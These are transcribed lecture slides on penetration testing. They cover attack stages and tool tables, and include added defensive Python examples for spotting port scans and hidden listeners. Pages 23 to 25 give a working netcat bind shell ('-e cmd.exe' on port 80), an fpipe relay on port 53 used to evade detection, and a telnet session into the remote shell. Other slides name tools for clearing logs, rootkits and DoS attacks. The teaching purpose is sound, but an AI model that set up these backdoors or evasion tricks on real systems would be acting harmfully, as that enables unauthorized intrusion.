cs691 (C. Edward Chow): Penetration Testing

Posted on 21-Dec-2015

Page 1: Penetration Testing

C. Edward Chow

Page 2: Outline of the Talk

Definition, concepts of penetration testing/hacking
Anatomy of a hack
Framework for penetration studies
Skills and requirements of a penetration tester
SANS list of security holes
Internet penetration
Dial-up penetration
Internal penetration

References:
Chapter 23, Vulnerability Analysis, by Matt Bishop.
Hack I.T.: Security Through Penetration Testing, by T.J. Klevinsky, Scott Laliberte, Ajay Gupta.
Hacking Exposed, by Stuart McClure, Joel Scambray and George Kurtz. http://www.hackingexposed.com/win2k/links.html

Page 3: Definition

Vulnerability (security flaw): a specific failure of the system to guard against unauthorized access or actions. It can lie in procedures, technology (software or hardware), or management.

Using such a failure of the system to violate the site security policy is called exploiting the vulnerability.

A penetration study is a test for evaluating the strength of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them.

Penetration testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy.

Penetration testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system.

It is not a proof technique. It can never prove the absence of security flaws; it can only prove their presence.

Example goals of penetration studies are gaining read or write access to specific objects, files, or accounts; gaining specific privileges; and disrupting or denying the availability of objects.

What is the difference between penetration testing and hacking/intrusion?

Page 4: More Thorough Penetration Study

A more thorough penetration study finds the proper interpretation of the vulnerabilities found and draws conclusions about the care taken in the design and implementation.

A simple list of vulnerabilities, although helpful in closing those specific holes, contributes far less to the security of a system.

In practice, constraints (resources, money, time) affect the penetration study.

Page 5: Hacking Methodology (Steps)

An excellent description is inside the back cover page of the "Hacking Exposed" text by McClure et al.

Step                  Tools
Footprinting          whois, nslookup
Scanning              nmap, fping
Enumeration           dumpACL, showmount, legion, rpcinfo
Gaining Access        tcpdump, L0phtcrack, NAT
Escalating Privilege  John the Ripper, getadmin
Pilfering             rhosts, user data, config files, registry
Covering Tracks       zap, rootkits
Creating Back Doors   cron, at, startup folder, netcat, keystroke logger, remote desktop
Denial of Service     synk4, ping of death, tfn/stacheldraht

Page 6: Footprinting

Information gathering. Sam Spade is a Windows-based network query tool. Find out the target IP address/phone number range.

Why check phone numbers? Namespace acquisition. Network topology (VisualRoute). It is essential to a "surgical" attack. The key here is not to miss any details. Note that for a penetration tester, this step is to avoid testing others instead of your client, and to include all systems to be tested (sometimes the organization will not tell you what their systems consist of).

Defense: deploy a NIDS (snort), RotoRouter.

Technique                                             Tools
Open source search                                    Google, search engines, Edgar
Find domain name, admin, IP addresses, name servers   Whois (Network Solutions; ARIN)
DNS zone transfer                                     nslookup (ls -d), dig, Sam Spade

Page 7: Scanning

Bulk target assessment: which machines are up and what ports (services) are open. Focus on the most promising avenues of entry. To avoid being detected, these tools can reduce the frequency of packet sending and randomize the order of the ports or IP addresses to be scanned.

Note that some machines do not respond to ping but respond to requests to ports that are actually open. Ardor is an example.

Technique            Tools
Ping sweep           fping, icmpenum, WS_Ping ProPack, nmap
TCP/UDP port scan    nmap, SuperScan, fscan
OS detection         nmap, queso, siphon
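As an added example (not from the lecture), a defender-side detector for the scanning step described above: it reads constructed firewall connection-log lines and flags a source that touches many distinct ports on one host inside a sliding time window. The constructed log includes a slow, spread-out probe to show why the window length matters when scanners throttle and shuffle their probes.

```python
"""Detect port-scan behaviour (the Scanning step) in firewall connection logs.

Added example, not part of the lecture. The log format below is constructed
for this example: 'timestamp src dst:dport proto action' per line.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.0.0.5 probes seven ports in a few seconds, 10.0.0.7 is
# a slow probe spread over 40 minutes, 10.0.0.9 is ordinary web traffic.
SAMPLE_LOG = """\
2003-04-29T12:50:01 10.0.0.5 192.0.2.10:22 tcp DROP
2003-04-29T12:50:01 10.0.0.5 192.0.2.10:23 tcp DROP
2003-04-29T12:50:02 10.0.0.5 192.0.2.10:25 tcp DROP
2003-04-29T12:50:02 10.0.0.5 192.0.2.10:80 tcp ACCEPT
2003-04-29T12:50:03 10.0.0.5 192.0.2.10:110 tcp DROP
2003-04-29T12:50:03 10.0.0.5 192.0.2.10:139 tcp DROP
2003-04-29T12:50:04 10.0.0.5 192.0.2.10:443 tcp DROP
2003-04-29T12:50:10 10.0.0.9 192.0.2.10:80 tcp ACCEPT
2003-04-29T12:50:12 10.0.0.9 192.0.2.10:80 tcp ACCEPT
2003-04-29T12:55:00 10.0.0.7 192.0.2.10:21 tcp DROP
2003-04-29T13:05:00 10.0.0.7 192.0.2.10:3389 tcp DROP
2003-04-29T13:15:00 10.0.0.7 192.0.2.10:53 tcp DROP
2003-04-29T13:25:00 10.0.0.7 192.0.2.10:445 tcp DROP
2003-04-29T13:35:00 10.0.0.7 192.0.2.10:8080 tcp DROP
"""


def parse_log(text):
    """Yield (timestamp, src, dst, dport) tuples from the constructed format."""
    for line in text.splitlines():
        ts, src, dst_port, _proto, _action = line.split()
        dst, port = dst_port.rsplit(":", 1)
        yield datetime.fromisoformat(ts), src, dst, int(port)


def find_scanners(text, window_seconds=60, min_ports=5):
    """Return {src: max distinct ports} for sources that touch at least
    `min_ports` distinct ports on one destination within any sliding window
    of `window_seconds`. A longer window catches slow, randomised scans at
    the cost of more false positives; a short one misses them entirely."""
    window = timedelta(seconds=window_seconds)
    events = defaultdict(list)  # (src, dst) -> [(ts, port), ...]
    for ts, src, dst, port in parse_log(text):
        events[(src, dst)].append((ts, port))
    hits = {}
    for (src, _dst), evs in events.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            ports = {p for t, p in evs[i:] if t - start <= window}
            if len(ports) >= min_ports:
                hits[src] = max(hits.get(src, 0), len(ports))
    return hits


if __name__ == "__main__":
    print("1-minute window:", find_scanners(SAMPLE_LOG))
    print("1-hour window:  ", find_scanners(SAMPLE_LOG, window_seconds=3600))
```

With the one-minute window only the fast scanner is reported; widening it to an hour also surfaces the slow probe.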

Page 8: Enumeration

Identify valid user accounts or poorly protected resource shares. More intrusive probing than the scanning step.

Technique               Tools
List user accounts      Null sessions, DumpACL, sid2user, OnSite Admin
List file shares        showmount, NAT, legion
Identify applications   Banner grabbing with telnet or netcat, rpcinfo

Page 9: Gaining Access

Based on the information gathered so far, make an informed attempt to access the target.

Technique                 Tools
Password eavesdropping    tcpdump/ssldump, L0phtcrack readsmb
File share brute forcing  NAT, legion
Password file grab        tftp, pwdump2 (NT)
Buffer overflow           ttdb, bind, IIS .HTR/ISM.DLL

Page 10: Escalating Privilege

If only user-level access was obtained in the last step, seek to gain complete control of the system.

Technique           Tools
Password cracking   John the Ripper, L0phtcrack
Known exploits      lc_messages, getadmin, sechole

Page 11: Pilfering

Webster's Revised Unabridged Dictionary (1913): Pilfer \Pil"fer\, v. i. [imp. & p. p. Pilfered; p. pr. & vb. n. Pilfering.] [OF. pelfrer. See Pelf.] To steal in small quantities, or articles of small value; to practice petty theft.

Gather information to identify mechanisms that allow access to trusted systems.

Technique                        Tools
Evaluate trusts                  rhosts, LSA secrets
Search for cleartext passwords   User data, configuration files, registry

Page 12: Covering Tracks

Once total ownership of the target is secured, hiding this fact from system administrators becomes paramount, lest they quickly end the romp.

Technique    Tools
Clear logs   zap, Event Log GUI
Hide tools   Rootkits, file streaming

Page 13: Creating Back Doors

Trap doors will be laid in various parts of the system to ensure that privileged access is easily regained whenever the intruder decides.

Technique                        Tools
Create rogue user accounts       Members of wheel, admin
Schedule batch jobs              cron, AT
Infect startup files             rc, startup folder, registry keys
Plant remote control services    Netcat, remote.exe, VNC, BO2K, remote desktop
Install monitoring mechanisms    Keystroke loggers, add acct. to secadmin mail aliases
Replace apps with Trojans        login, fpnwclnt.dll

Page 14: Denial of Service

If the attacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.

Technique                          Tools
SYN flood                          synk4
ICMP techniques                    Ping of death, smurf
Identical src/dst SYN requests     land, latierra
Overlapping fragment/offset bugs
Out of bounds TCP options (OOB)
DDoS                               trinoo, TFN, stacheldraht

Page 15: Nessus: Integrated Security Scanning Tool

Originally designed by Renaud Deraison. Available at www.nessus.org. The main scanning engine runs on a Unix server, with a client GUI running on Unix or Windows. Pretty good control and reporting. Includes a script language for plug-ins (detecting additional attacks). http://www.nessus.org/pres/bh2001/index.html

Pages 16-21: no transcribed text.

Page 22: Setting up a Backdoor Connection

Once you obtain admin privilege, you install tools that allow you to run commands remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting messages (fpipe).

Port redirection accepts packets on one port and sends them out over another port. It can be used to get past a packet-filtering firewall.

We will use netcat and fpipe to illustrate the concept. Netcat is available at http://www.atstake.com/research/tools/network_utilities/ and fpipe is available at http://www.foundstone.com

Page 23: Setup Netcat

C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63
listening on [128.198.177.63] 80 ...
connect to [128.198.177.63] from VIVIAN.eas.uccs.edu
listening on [128.198.177.63] 80 ...
connect to [128.198.177.63] from VIVIAN.eas.uccs.edu

Here we bind to port 80. You can also use port 139. The idea is to use a well-known port to avoid detection. -L is used to repeat the previous command after the connection is terminated. The nc command receives a command from packets arriving at port 80, runs it with cmd.exe and sends back the execution result.

Page 24: Setup FPIPE

C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com

Pipe connected:
In: 128.198.162.60:58797 --> 128.198.177.63:53
Out: 128.198.168.63:53 --> 128.198.177.63:80
Pipe connected:
In: 128.198.162.60:58801 --> 128.198.177.63:53
Out: 128.198.177.63:53 --> 128.198.177.63:80

Here the fpipe program listens for packets coming from blanca to port 53 and relays them to 128.198.177.63, using port 53 (DNS) to avoid detection.
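As an added example (not from the lecture or either tool's own code), a defender-side check for the "use a known port" evasion shown on the netcat and fpipe slides: it parses a constructed netstat -ano style socket table and a constructed pid-to-image map, and flags any listener on a well-known port whose owning process is not the expected server. The EXPECTED_OWNERS allowlist is an assumption about the host being checked.

```python
"""Flag listeners hiding on well-known ports (e.g. netcat bound to 80, fpipe
bound to 53). Added example, not from the lecture or either tool; the socket
table and pid->image map below are constructed to resemble `netstat -ano`
and `tasklist` output on Windows."""
import re

# Constructed `netstat -ano` style rows: proto, local addr, foreign addr, state, pid
NETSTAT_SAMPLE = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    128.198.177.63:80      0.0.0.0:0              LISTENING       1744
  TCP    128.198.168.63:53      0.0.0.0:0              LISTENING       2012
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       1500
  TCP    128.198.168.63:3389    10.0.0.5:51022         ESTABLISHED     900
"""
# Constructed pid -> image name mapping (what tasklist would report)
PROCESS_SAMPLE = {884: "svchost.exe", 1744: "nc.exe", 2012: "fpipe.exe",
                  1500: "inetinfo.exe", 900: "svchost.exe"}

# Assumed allowlist: which server images may own each well-known port on this host
EXPECTED_OWNERS = {80: {"inetinfo.exe"}, 443: {"inetinfo.exe"},
                   53: {"dns.exe"}, 135: {"svchost.exe"}, 139: {"System"}}

# TCP sockets in LISTENING state only; UDP rows have no state column and are skipped
LINE_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def listening_sockets(netstat_text):
    """Return [(local_addr, port, pid)] for every TCP LISTENING row."""
    rows = []
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return rows


def suspicious_listeners(netstat_text, processes, expected=EXPECTED_OWNERS):
    """Return [(port, image, detail)] for listeners on a port in `expected`
    whose owning image is not one of the allowed servers. Ports outside the
    allowlist are skipped: this check targets the 'known port' evasion, not
    every unexpected listener on the host."""
    findings = []
    for addr, port, pid in listening_sockets(netstat_text):
        if port not in expected:
            continue
        image = processes.get(pid, "<unknown>")
        if image not in expected[port]:
            findings.append((port, image,
                             f"{image} (pid {pid}) owns {addr}:{port}; "
                             f"expected {sorted(expected[port])}"))
    return findings


if __name__ == "__main__":
    for port, image, detail in suspicious_listeners(NETSTAT_SAMPLE, PROCESS_SAMPLE):
        print(f"ALERT port {port}: {detail}")
```

Image names are self-reported and trivially renamed, so a clean result is not evidence of absence; confirm hits against the binary's path and hash.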

Page 25: Telnet to the relay host

[cs691@blanca cs691]$ telnet 128.198.168.63 53
Trying 128.198.168.63...
Connected to vivian (128.198.168.63).
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\work\cucs\cs522\project>dir
dir
 Volume in drive C is S3A1203D501
 Volume Serial Number is 503B-9F00

 Directory of C:\work\cucs\cs522\project

04/29/2003  12:56 PM    <DIR>          .
04/29/2003  12:56 PM    <DIR>          ..
04/29/2003  12:50 PM           371,208 erniestInfocom2000.ps
04/29/2003  12:52 PM           204,590 ernstInfocom2000.pdf

Page 26: Layering of Tests

1. External attacker with no knowledge of the system.

2. External attacker with access to the system.

3. Internal attacker with access to the system.

Page 27: no transcribed text.